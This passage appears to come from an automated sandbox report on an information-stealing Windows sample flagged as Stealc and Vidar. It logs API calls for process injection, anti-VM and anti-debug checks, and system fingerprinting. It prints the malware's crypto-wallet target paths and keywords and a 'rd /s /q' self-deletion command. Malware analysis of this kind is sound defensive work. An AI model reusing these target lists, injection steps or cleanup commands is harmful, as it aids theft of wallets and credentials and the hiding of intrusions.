Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D66A05 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	0_2_00D66A05
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D68D90 SHGetFolderPathA,wsprintfA,FindFirstFileA,_mbscmp,_mbscmp,_mbscmp,_splitpath,_ismbcupper,wsprintfA,SHFileOperationA,FindNextFileA,FindClose,	0_2_00D68D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D51D70 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00D51D70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D67D20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00D67D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D5C888 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00D5C888
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D6785A GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_00D6785A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D5A941 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,_memset,lstrcatA,lstrcatA,lstrcatA,CopyFileA,_memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00D5A941
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D5E5B9 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00D5E5B9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D5C528 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_00D5C528
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D5DD2A wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_00D5DD2A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D5CE96 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_00D5CE96

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00D66E7F GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

0_2_00D66E7F

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00D62C16 GetSystemInfo,wsprintfA,

0_2_00D62C16

Source: file.exe, 00000000.00000002.2582970427.000000000357E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW9
Source: file.exe, 00000000.00000002.2582970427.00000000035D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f
Source: file.exe, 00000000.00000002.2582970427.000000000351E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx:X
Source: file.exe, 00000000.00000002.2582970427.000000000357E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2582970427.000000000351E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-21498
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-21514
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-22624

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00D6E88C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00D6E88C

Source: C:\Users\user\Desktop\file.exe

0_2_00D6A132

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D5149D mov eax, dword ptr fs:[00000030h]	0_2_00D5149D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D51492 mov eax, dword ptr fs:[00000030h]	0_2_00D51492
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D5147A mov eax, dword ptr fs:[00000030h]	0_2_00D5147A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D69D78 mov eax, dword ptr fs:[00000030h]	0_2_00D69D78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D69D79 mov eax, dword ptr fs:[00000030h]	0_2_00D69D79

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00D628E1 GetProcessHeap,HeapAlloc,GetComputerNameA,

0_2_00D628E1

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D6E88C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00D6E88C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D6F20C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00D6F20C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D78EAE SetUnhandledExceptionFilter,	0_2_00D78EAE

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 6544, type: MEMORYSTR

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00D612EC _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,

0_2_00D612EC

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D642EE __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	0_2_00D642EE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D643C5 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	0_2_00D643C5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D64452 CreateToolhelp32Snapshot,Process32First,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,	0_2_00D64452

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FCAKFCGCGIEG" & exit			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00D5118E cpuid

0_2_00D5118E

Source: C:\Users\user\Desktop\file.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	0_2_00D62A37
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00D7C94C
Source: C:\Users\user\Desktop\file.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_00D7B2D0
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	0_2_00D7CAE8
Source: C:\Users\user\Desktop\file.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	0_2_00D7CA41
Source: C:\Users\user\Desktop\file.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	0_2_00D7C3C0
Source: C:\Users\user\Desktop\file.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	0_2_00D7CB43
Source: C:\Users\user\Desktop\file.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	0_2_00D76C63
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesA,	0_2_00D7CDD6
Source: C:\Users\user\Desktop\file.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_00D78DF6
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	0_2_00D7FDEF
Source: C:\Users\user\Desktop\file.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_00D7B5EE
Source: C:\Users\user\Desktop\file.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	0_2_00D7CD14
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	0_2_00D78D1C
Source: C:\Users\user\Desktop\file.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	0_2_00D7CEA3
Source: C:\Users\user\Desktop\file.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_00D7A644
Source: C:\Users\user\Desktop\file.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_00D7CE67
Source: C:\Users\user\Desktop\file.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_00D7CE00
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoA,	0_2_00D7FF24

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00D6D8CB lstrcpyA,GetLocalTime,SystemTimeToFileTime,

0_2_00D6D8CB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00D628AF GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_00D628AF

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00D6298A GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_00D6298A

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: file.exe, 00000000.00000003.2411985169.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2582970427.000000000351E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: file.exe, type: SAMPLE
Source: Yara match	File source: 0.0.file.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2033663446.0000000000D81000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6544, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: file.exe, type: SAMPLE
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0.0.file.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.d8ecc0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2033663446.0000000000D81000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6544, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: ,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|2\|Windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|Flash\|%DRIVE_REMOVABLE%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|3\|windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,*.mp3\|
Source: file.exe, 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: bi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: bi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: bi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: bi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: bi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: bi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia 